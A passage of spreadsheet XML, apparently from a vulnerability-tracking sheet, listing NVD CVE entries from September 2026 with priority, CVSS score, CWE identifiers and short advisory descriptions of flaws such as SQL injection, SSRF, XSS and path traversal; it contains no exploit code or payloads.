      <c r="G999" s="5" t="inlineStr"/>
      <c r="H999" s="5" t="inlineStr"/>
      <c r="I999" s="5" t="inlineStr"/>
      <c r="J999" s="5" t="inlineStr"/>
      <c r="K999" s="5" t="inlineStr"/>
      <c r="L999" s="5" t="inlineStr"/>
      <c r="M999" s="5" t="inlineStr"/>
      <c r="N999" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O999" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P999" s="5" t="inlineStr"/>
      <c r="Q999" s="5" t="inlineStr">
        <is>
          <t>CWE-345, CWE-346</t>
        </is>
      </c>
      <c r="R999" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in ag-ui-protocol ag-ui 1.0. The impacted element is the function prepareRunAgentInput of the file agent/agent.ts of the component Event Application Layer. This manipulation of the argument TEXT_MESSAGE_START causes origin validation error. Remote exploitation of the attack is possible. The pull request to fix this issue awaits acceptance.</t>
        </is>
      </c>
      <c r="S999" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92360</t>
        </is>
      </c>
    </row>
    <row r="1000">
      <c r="A1000" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1000" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1000" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92402</t>
        </is>
      </c>
      <c r="D1000" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E1000" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1000" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1000" s="5" t="inlineStr"/>
      <c r="H1000" s="5" t="inlineStr"/>
      <c r="I1000" s="5" t="inlineStr"/>
      <c r="J1000" s="5" t="inlineStr"/>
      <c r="K1000" s="5" t="inlineStr"/>
      <c r="L1000" s="5" t="inlineStr"/>
      <c r="M1000" s="5" t="inlineStr"/>
      <c r="N1000" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1000" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1000" s="5" t="inlineStr"/>
      <c r="Q1000" s="5" t="inlineStr">
        <is>
          <t>CWE-862, CWE-863</t>
        </is>
      </c>
      <c r="R1000" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in ChangeWeDer crm up to c07bd4c97141521af6475034bc58523beed51bbd. This issue affects the function index of the file UserController.java of the component top.upstudy.crm.controller.UserController. The manipulation results in missing authorization. The attack can be launched remotely. This product does not use versioning. This is why information about affected and unaffected releases are unavailable. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="S1000" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92402</t>
        </is>
      </c>
    </row>
    <row r="1001">
      <c r="A1001" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1001" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1001" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92526</t>
        </is>
      </c>
      <c r="D1001" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E1001" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1001" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1001" s="5" t="inlineStr"/>
      <c r="H1001" s="5" t="inlineStr"/>
      <c r="I1001" s="5" t="inlineStr"/>
      <c r="J1001" s="5" t="inlineStr"/>
      <c r="K1001" s="5" t="inlineStr"/>
      <c r="L1001" s="5" t="inlineStr"/>
      <c r="M1001" s="5" t="inlineStr"/>
      <c r="N1001" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1001" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1001" s="5" t="inlineStr"/>
      <c r="Q1001" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="R1001" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in itsourcecode Leave Management System 1.0. This affects an unknown function of the file /module/leave/index.php. Executing a manipulation of the argument ID can lead to sql injection. The attack may be launched remotely. The exploit has been published and may be used.</t>
        </is>
      </c>
      <c r="S1001" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92526</t>
        </is>
      </c>
    </row>
    <row r="1002">
      <c r="A1002" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1002" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1002" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92527</t>
        </is>
      </c>
      <c r="D1002" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E1002" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1002" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1002" s="5" t="inlineStr"/>
      <c r="H1002" s="5" t="inlineStr"/>
      <c r="I1002" s="5" t="inlineStr"/>
      <c r="J1002" s="5" t="inlineStr"/>
      <c r="K1002" s="5" t="inlineStr"/>
      <c r="L1002" s="5" t="inlineStr"/>
      <c r="M1002" s="5" t="inlineStr"/>
      <c r="N1002" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1002" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1002" s="5" t="inlineStr"/>
      <c r="Q1002" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R1002" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in chatwoot up to 4.17.1. This impacts an unknown function of the file callbacks_controller.rb of the component Shopify OAuth. The manipulation leads to server-side request forgery. Remote exploitation of the attack is possible. The exploit has been disclosed to the public and may be used. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="S1002" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92527</t>
        </is>
      </c>
    </row>
    <row r="1003">
      <c r="A1003" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1003" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1003" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92781</t>
        </is>
      </c>
      <c r="D1003" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E1003" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1003" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1003" s="5" t="inlineStr"/>
      <c r="H1003" s="5" t="inlineStr"/>
      <c r="I1003" s="5" t="inlineStr"/>
      <c r="J1003" s="5" t="inlineStr"/>
      <c r="K1003" s="5" t="inlineStr"/>
      <c r="L1003" s="5" t="inlineStr"/>
      <c r="M1003" s="5" t="inlineStr"/>
      <c r="N1003" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1003" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1003" s="5" t="inlineStr"/>
      <c r="Q1003" s="5" t="inlineStr">
        <is>
          <t>CWE-1321</t>
        </is>
      </c>
      <c r="R1003" s="5" t="inlineStr">
        <is>
          <t>Builder.io Gen2 SDKs through versions 5.2.11 and 0.25.13 contain a prototype pollution vulnerability in the unflatten helper that processes builder.userAttributes query parameters without prototype guards. Attackers can craft preview links with __proto__ or prototype segments to pollute Object.prototype in a visitor's browser when the SDK processes the malicious URL.</t>
        </is>
      </c>
      <c r="S1003" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92781</t>
        </is>
      </c>
    </row>
    <row r="1004">
      <c r="A1004" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1004" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1004" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19543</t>
        </is>
      </c>
      <c r="D1004" s="5" t="n">
        <v>6.2</v>
      </c>
      <c r="E1004" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1004" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G1004" s="5" t="inlineStr"/>
      <c r="H1004" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1004" s="5" t="inlineStr"/>
      <c r="J1004" s="5" t="inlineStr"/>
      <c r="K1004" s="5" t="inlineStr"/>
      <c r="L1004" s="5" t="inlineStr"/>
      <c r="M1004" s="5" t="inlineStr"/>
      <c r="N1004" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1004" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1004" s="5" t="inlineStr"/>
      <c r="Q1004" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="R1004" s="5" t="inlineStr">
        <is>
          <t>IBM Common Licensing Agent 9.0, Agent 9.0.0.1, Agent 9.0.0.2, ART 9.0, ART 9.0.0.1, and ART 9.0.0.2 performs input validation exclusively on the client side and fails to enforce the same restrictions on the server side. An attacker can modify requests to bypass validation controls and submit unauthorized values, potentially resulting in unintended application behavior.</t>
        </is>
      </c>
      <c r="S1004" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19543</t>
        </is>
      </c>
    </row>
    <row r="1005">
      <c r="A1005" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1005" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1005" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55073</t>
        </is>
      </c>
      <c r="D1005" s="5" t="n">
        <v>6.2</v>
      </c>
      <c r="E1005" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1005" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G1005" s="5" t="inlineStr"/>
      <c r="H1005" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1005" s="5" t="inlineStr"/>
      <c r="J1005" s="5" t="inlineStr"/>
      <c r="K1005" s="5" t="inlineStr"/>
      <c r="L1005" s="5" t="inlineStr"/>
      <c r="M1005" s="5" t="inlineStr"/>
      <c r="N1005" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1005" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1005" s="5" t="inlineStr"/>
      <c r="Q1005" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R1005" s="5" t="inlineStr">
        <is>
          <t>WeasyPrint helps web developers to create PDF documents. Prior to 70.0, server-side applications that configure a restrictive url_fetcher and pass attacker-influenced values to HTML.write_pdf() can have the restriction bypassed through the xmp_metadata or stylesheets options. In weasyprint/pdf/init.py, xmp_metadata calls select_source() without the document url_fetcher, allowing an accessible local file to be read and embedded verbatim in the output PDF. In weasyprint/document.py, stylesheets constructs CSS() without the document url_fetcher, allowing local or internal resource loading and propagating the permissive fetcher through nested CSS imports and url() references. The stylesheets channel applies fetched resources but does not by itself disclose stylesheet comments verbatim. This issue is fixed in version 70.0.</t>
        </is>
      </c>
      <c r="S1005" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55073</t>
        </is>
      </c>
    </row>
    <row r="1006">
      <c r="A1006" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1006" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1006" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55846</t>
        </is>
      </c>
      <c r="D1006" s="5" t="n">
        <v>6.2</v>
      </c>
      <c r="E1006" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1006" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G1006" s="5" t="inlineStr"/>
      <c r="H1006" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1006" s="5" t="inlineStr"/>
      <c r="J1006" s="5" t="inlineStr"/>
      <c r="K1006" s="5" t="inlineStr"/>
      <c r="L1006" s="5" t="inlineStr"/>
      <c r="M1006" s="5" t="inlineStr"/>
      <c r="N1006" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1006" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1006" s="5" t="inlineStr"/>
      <c r="Q1006" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R1006" s="5" t="inlineStr">
        <is>
          <t>Allure 2 is the version 2.x branch of Allure Report, a multi-language test reporting tool. Prior to 2.39.0, the HTTP server started by allure serve and allure open uses URI.getPath() in Commands.setUpServer() in allure-commandline/src/main/java/io/qameta/allure/Commands.java and passes the percent-decoded request path to reportDirectory.resolve() without normalizing the result or confirming that it remains inside that directory. An unauthenticated client that can reach the server can submit parent-directory segments, including percent-encoded segments, and cause serveFile() to return any regular file readable by the Allure process. The server binds to localhost by default, but the --host option can expose it to other systems, and local users, adjacent containers, or browser-origin attacks may reach a local listener. This can disclose credentials, configuration, source code, build secrets, and other CI/CD data. This issue is fixed in version 2.39.0.</t>
        </is>
      </c>
      <c r="S1006" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55846</t>
        </is>
      </c>
    </row>
    <row r="1007">
      <c r="A1007" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1007" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1007" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89329</t>
        </is>
      </c>
      <c r="D1007" s="5" t="n">
        <v>6.2</v>
      </c>
      <c r="E1007" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1007" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G1007" s="5" t="inlineStr"/>
      <c r="H1007" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1007" s="5" t="inlineStr"/>
      <c r="J1007" s="5" t="inlineStr"/>
      <c r="K1007" s="5" t="inlineStr"/>
      <c r="L1007" s="5" t="inlineStr"/>
      <c r="M1007" s="5" t="inlineStr"/>
      <c r="N1007" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1007" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1007" s="5" t="inlineStr"/>
      <c r="Q1007" s="5" t="inlineStr">
        <is>
          <t>CWE-1322</t>
        </is>
      </c>
      <c r="R1007" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in `multipathd`. A local attacker with access to the `multipathd` UNIX control socket can exploit this vulnerability by sending valid commands and then ceasing to read replies. This action can cause the `multipathd` listener thread to block, leading to a Denial of Service (DoS) where legitimate Inter-Process Communication (IPC) operations may hang or time out. This issue does not result in privilege escalation, arbitrary code execution, or impact data confidentiality or integrity.</t>
        </is>
      </c>
      <c r="S1007" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89329</t>
        </is>
      </c>
    </row>
    <row r="1008">
      <c r="A1008" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1008" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1008" s="5" t="inlineStr">
        <is>
          <t>CVE-2023-51769</t>
        </is>
      </c>
      <c r="D1008" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E1008" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1008" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G1008" s="5" t="inlineStr"/>
      <c r="H1008" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1008" s="5" t="inlineStr"/>
      <c r="J1008" s="5" t="inlineStr"/>
      <c r="K1008" s="5" t="inlineStr"/>
      <c r="L1008" s="5" t="inlineStr"/>
      <c r="M1008" s="5" t="inlineStr"/>
      <c r="N1008" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1008" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1008" s="5" t="inlineStr"/>
      <c r="Q1008" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R1008" s="5" t="inlineStr">
        <is>
          <t>Frappe before 14.49.0 allows an XSS attack that is associated with blog pages and exception pages.</t>
        </is>
      </c>
      <c r="S1008" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2023-51769</t>
        </is>
      </c>
    </row>
    <row r="1009">
      <c r="A1009" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1009" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1009" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-13276</t>
        </is>
      </c>
      <c r="D1009" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E1009" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1009" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1009" s="5" t="inlineStr"/>
      <c r="H1009" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1009" s="5" t="inlineStr"/>
      <c r="J1009" s="5" t="inlineStr"/>
      <c r="K1009" s="5" t="inlineStr"/>
      <c r="L1009" s="5" t="inlineStr"/>
      <c r="M1009" s="5" t="inlineStr"/>
      <c r="N1009" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1009" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1009" s="5" t="inlineStr"/>
      <c r="Q1009" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R1009" s="5" t="inlineStr">
        <is>
          <t>IBM Verify Identity Access 11.0.0 through 11.0.3 Interim Fix 001 and IBM Security Verify Access 10.0.0 through 10.0.9.2 Interim Fix 001 and IBM Verify Identity Access Container 11.0.0 through 11.0.3 Interim Fix 001 and IBM Security Verify Access Container 10.0.0 through 10.0.9.2 Interim Fix 001.</t>
        </is>
      </c>
      <c r="S1009" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-13276</t>
        </is>
      </c>
    </row>
    <row r="1010">
      <c r="A1010" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1010" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1010" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18495</t>
        </is>
      </c>
      <c r="D1010" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E1010" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1010" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1010" s="5" t="inlineStr"/>
      <c r="H1010" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1010" s="5" t="inlineStr"/>
      <c r="J1010" s="5" t="inlineStr"/>
      <c r="K1010" s="5" t="inlineStr"/>
      <c r="L1010" s="5" t="inlineStr"/>
      <c r="M1010" s="5" t="inlineStr"/>
      <c r="N1010" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1010" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1010" s="5" t="inlineStr"/>
      <c r="Q1010" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R1010" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in libtiff. A heap-buffer overflow vulnerability exists in the `tiff2pdf` utility due to an integer truncation error when processing crafted BigTIFF files. An attacker can provide a specially crafted BigTIFF file, causing a 64-bit `StripByteCounts` value to be truncated to a 32-bit integer. This leads to an undersized memory allocation and a subsequent out-of-bounds memory copy, resulting in a crash and severe memory corruption.</t>
        </is>
      </c>
      <c r="S1010" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18495</t>
        </is>
      </c>
    </row>
    <row r="1011">
      <c r="A1011" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1011" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1011" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18555</t>
        </is>
      </c>
      <c r="D1011" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E1011" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1011" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1011" s="5" t="inlineStr"/>
      <c r="H1011" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1011" s="5" t="inlineStr"/>
      <c r="J1011" s="5" t="inlineStr"/>
      <c r="K1011" s="5" t="inlineStr"/>
      <c r="L1011" s="5" t="inlineStr"/>
      <c r="M1011" s="5" t="inlineStr"/>
      <c r="N1011" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1011" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1011" s="5" t="inlineStr"/>
      <c r="Q1011" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R1011" s="5" t="inlineStr">
        <is>
          <t>The Better Messages – Chat Rooms, Group Chat, Private Messages &amp; AI Chat Bots plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'icn' parameter in all versions up to, and including, 2.15.22 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.</t>
        </is>
      </c>
      <c r="S1011" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18555</t>
        </is>
      </c>
    </row>
    <row r="1012">
      <c r="A1012" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1012" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1012" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20309</t>
        </is>
      </c>
      <c r="D1012" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E1012" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1012" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1012" s="5" t="inlineStr"/>
      <c r="H1012" s="5" t="inlineStr"/>
      <c r="I1012" s="5" t="inlineStr"/>
      <c r="J1012" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K1012" s="5" t="inlineStr"/>
      <c r="L1012" s="5" t="inlineStr"/>
      <c r="M1012" s="5" t="inlineStr"/>
      <c r="N1012" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1012" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1012" s="5" t="inlineStr"/>
      <c r="Q1012" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R1012" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the web-based management interface of Cisco Identity Services Engine (ISE) could allow an unauthenticated, remote attacker to conduct a reflected cross-site scripting (XSS) attack against a user of the interface.
This vulnerability exists because the web-based management interface does not properly validate user-supplied input. An attacker could exploit this vulnerability by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information.</t>
        </is>
      </c>
      <c r="S1012" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20309</t>
        </is>
      </c>
    </row>
    <row r="1013">
      <c r="A1013" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1013" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1013" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-59944</t>
        </is>
      </c>
      <c r="D1013" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E1013" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1013" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G1013" s="5" t="inlineStr"/>
      <c r="H1013" s="5" t="inlineStr"/>
      <c r="I1013" s="5" t="inlineStr"/>
      <c r="J1013" s="5" t="inlineStr"/>
      <c r="K1013" s="5" t="inlineStr"/>
      <c r="L1013" s="5" t="inlineStr"/>
      <c r="M1013" s="5" t="inlineStr"/>
      <c r="N1013" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1013" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1013" s="5" t="inlineStr"/>
      <c r="Q1013" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-59</t>
        </is>
      </c>
      <c r="R1013" s="5" t="inlineStr">
        <is>
          <t>Composer is a dependency Manager for the PHP language. From 1.0 until 2.2.30 and from 2.3.0 until 2.10.3, a malicious or compromised dependency can bypass the earlier CVE-2026-59946 binary-path hardening because Composer validates literal parent-directory segments only during dependency resolution, while the symlink and installed-metadata paths described by the advisory skip that validation. A package can ship an in-package binary symlink that resolves outside its installation directory, or attacker-influenced vendor/composer/installed.json metadata can provide an escaping binary path during a reinstall or regeneration of missing vendor/bin entries. The installed-metadata path is reachable only when the vendor directory was not populated by the same validated install run, such as when it is restored from an untrusted cache, copied from an earlier build stage, carried over from an older Composer run, or writable by a lower-trust build step. Composer can follow the path, change the external target's permissions to make it world-readable and executable, and create a runnable vendor/bin proxy to that external file. The issue does not directly read or transmit data and does not by itself provide remote code execution. This issue is fixed in versions 2.2.30 and 2.10.3.</t>
        </is>
      </c>
      <c r="S1013" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-59944</t>
        </is>
      </c>
    </row>
    <row r="1014">
      <c r="A1014" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1014" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1014" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63523</t>
        </is>
      </c>
      <c r="D1014" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E1014" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1014" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1014" s="5" t="inlineStr"/>
      <c r="H1014" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I1014" s="5" t="inlineStr"/>
      <c r="J1014" s="5" t="inlineStr"/>
      <c r="K1014" s="5" t="inlineStr">
        <is>
          <t>microsoft:skype_for_business_server, microsoft:skype_for_business_server_subscription_edition</t>
        </is>
      </c>
      <c r="L1014" s="5" t="inlineStr"/>
      <c r="M1014" s="5" t="inlineStr"/>
      <c r="N1014" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1014" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1014" s="5" t="inlineStr"/>
      <c r="Q1014" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R1014" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of input during web page generation ('cross-site scripting') in Skype for Business allows an unauthorized attacker to perform spoofing over a network.</t>
        </is>
      </c>
      <c r="S1014" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63523</t>
        </is>
      </c>
    </row>
    <row r="1015">
      <c r="A1015" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1015" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
